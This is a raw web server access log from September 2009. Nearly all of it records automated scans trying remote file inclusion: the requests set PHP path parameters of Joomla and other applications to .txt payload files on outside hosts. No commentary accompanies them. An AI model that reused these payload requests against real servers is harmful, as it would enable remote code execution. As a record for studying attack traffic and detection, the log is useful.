216.22.26.195 - - [11/Sep/2009:11:00:02 -0500] "GET /logs/access_log.1236211200//components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:00:08 -0500] "GET /logs/access_log.1244764800//components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:00:36 -0500] "GET /errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:00:37 -0500] "GET /logs/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:00:37 -0500] "GET /logs/access_log.1242777600/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:00:57 -0500] "GET /errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:00:58 -0500] "GET /logs/access_log.1242777600/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:00:58 -0500] "GET /logs/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:01:09 -0500] "GET //common/db.php?commonpath=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:01:09 -0500] "GET /logs/access_log.1242777600//common/db.php?commonpath=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:01:09 -0500] "GET /logs//common/db.php?commonpath=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:01:35 -0500] "GET /logs//common/db.php?commonpath=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:01:35 -0500] "GET //common/db.php?commonpath=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:01:35 -0500] "GET /logs/access_log.1242777600//common/db.php?commonpath=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:03:23 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:03:23 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:03:23 -0500] "GET /logs/access_log.1236038400//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:04:00 -0500] "GET /logs/access_log.1235606400//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:04:01 -0500] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.6.190.236 - - [11/Sep/2009:11:04:12 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.6.190.236 - - [11/Sep/2009:11:04:12 -0500] "GET //admin/include/lib.module.php?mod_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.6.190.236 - - [11/Sep/2009:11:04:12 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:05:11 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:05:11 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:05:11 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:05:16 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:05:16 -0500] "GET /logs/access_log.1235606400//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:05:16 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:11:05:16 -0500] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:06:02 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:06:02 -0500] "GET //components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:06:02 -0500] "GET /logs/access_log.1236211200//components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:06:08 -0500] "GET /logs/access_log.1244764800//components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
219.93.2.80 - - [11/Sep/2009:11:06:56 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
219.93.2.80 - - [11/Sep/2009:11:06:56 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
219.93.2.80 - - [11/Sep/2009:11:06:56 -0500] "GET /logs/access_log.1236211200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:07:01 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:07:01 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:07:01 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:11:08:21 -0500] "GET /become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:11:08:21 -0500] "GET /logs/become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:11:08:21 -0500] "GET /logs/access_log.1245715200/become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.106.114 - - [11/Sep/2009:11:08:37 -0500] "GET /logs/access_log.1191369600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.251.105.194 - - [11/Sep/2009:11:08:52 -0500] "GET /logs/access_log.1238112000/become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:11:10:18 -0500] "GET //setup.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:11:10:18 -0500] "GET /logs/access_log.1251763200//setup.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:11:10:18 -0500] "GET /logs//setup.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.106.235 - - [11/Sep/2009:11:10:44 -0500] "GET /logs/access_log.1181001600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.75.202.55 - - [11/Sep/2009:11:10:52 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:10:52 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:10:52 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:11:04 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:11:11:10 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:12:35 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:12:35 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:12:35 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
219.93.2.80 - - [11/Sep/2009:11:15:18 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
219.93.2.80 - - [11/Sep/2009:11:15:18 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
219.93.2.80 - - [11/Sep/2009:11:15:18 -0500] "GET /logs/access_log.1236211200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
92.52.216.123 - - [11/Sep/2009:11:15:49 -0500] "GET /logs/access_log.1238112000//phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
92.52.216.123 - - [11/Sep/2009:11:15:49 -0500] "GET /logs//phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
92.52.216.123 - - [11/Sep/2009:11:15:49 -0500] "GET /logs/access_log.1249084800//phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
92.52.216.123 - - [11/Sep/2009:11:15:49 -0500] "GET //phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:16:01 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:16:01 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:16:01 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.208.123 - - [11/Sep/2009:11:16:09 -0500] "GET /logs/access_log.1250121600 HTTP/1.1" 200 544773 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [11/Sep/2009:11:17:56 -0500] "GET /logs/access_log.1250035200 HTTP/1.1" 200 877940 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
204.30.3.225 - - [11/Sep/2009:11:18:09 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:18:09 -0500] "GET /logs/access_log.1243900800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:18:09 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:19:06 -0500] "GET /logs/access_log.1245974400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:19:06 -0500] "GET /logs/access_log.1245888000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:19:07 -0500] "GET /logs/access_log.1247875200//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:19:36 -0500] "GET /logs/access_log.1244937600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.115 - - [11/Sep/2009:11:21:07 -0500] "GET /logs/access_log.1201824000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.186.117.226 - - [11/Sep/2009:11:21:37 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:11:21:37 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:11:21:37 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:21:46 -0500] "GET /logs/access_log.1243296000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.206 - - [11/Sep/2009:11:22:06 -0500] "GET /logs/access_log.1112486400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.30.3.225 - - [11/Sep/2009:11:22:22 -0500] "GET /logs/access_log.1243641600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:22:29 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:22:29 -0500] "GET /logs/access_log.1243468800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.2 - - [11/Sep/2009:11:23:03 -0500] "GET //setup.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.2 - - [11/Sep/2009:11:23:03 -0500] "GET /logs/access_log.1251763200//setup.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.2 - - [11/Sep/2009:11:23:03 -0500] "GET /logs//setup.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:11:23:11 -0500] "GET /logs/access_log.1245715200/////?_SERVER[DOCUMENT_ROOT]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:11:23:11 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:11:23:12 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 200 204586 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:11:23:21 -0500] "GET /logs/access_log.1238112000/////?_SERVER[DOCUMENT_ROOT]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:11:24:55 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:11:24:55 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:11:24:55 -0500] "GET /logs/access_log.1244764800/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:11:26:20 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 200 10025 "-""Mozilla/4.0"
62.140.23.192 - - [11/Sep/2009:11:27:17 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:17 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:17 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:38 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:38 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:38 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:39 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:40 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:40 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:41 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:42 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:43 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:49 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:49 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:50 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [11/Sep/2009:11:27:51 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.208.124 - - [11/Sep/2009:11:29:08 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [11/Sep/2009:11:29:09 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 200 413882 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
70.85.42.34 - - [11/Sep/2009:11:30:24 -0500] "GET //modules/xfsection/modify.php?dir_module=http://yestour.net/bbs/ps/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.831"
70.85.42.34 - - [11/Sep/2009:11:30:24 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://yestour.net/bbs/ps/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.831"
204.30.3.225 - - [11/Sep/2009:11:30:36 -0500] "GET //errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:30:36 -0500] "GET /logs/access_log.1237075200//errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:30:42 -0500] "GET /logs//errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:11:31:03 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:11:31:03 -0500] "GET /?sourcedir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:11:31:04 -0500] "GET /logs/?sourcedir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
204.30.3.225 - - [11/Sep/2009:11:31:05 -0500] "GET /logs/access_log.1236038400//errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.85.42.34 - - [11/Sep/2009:11:31:06 -0500] "GET //modules/xfsection/modify.php?dir_module=http://yestour.net/bbs/ps/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.831"
70.85.42.34 - - [11/Sep/2009:11:31:06 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://yestour.net/bbs/ps/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.831"
222.236.47.23 - - [11/Sep/2009:11:32:07 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:32:07 -0500] "GET /?custompluginfile[]=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:11:32:08 -0500] "GET /logs/?custompluginfile[]=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:11:35:15 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:11:35:15 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:11:35:15 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:11:35:37 -0500] "GET /logs/access_log.1237334400/?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
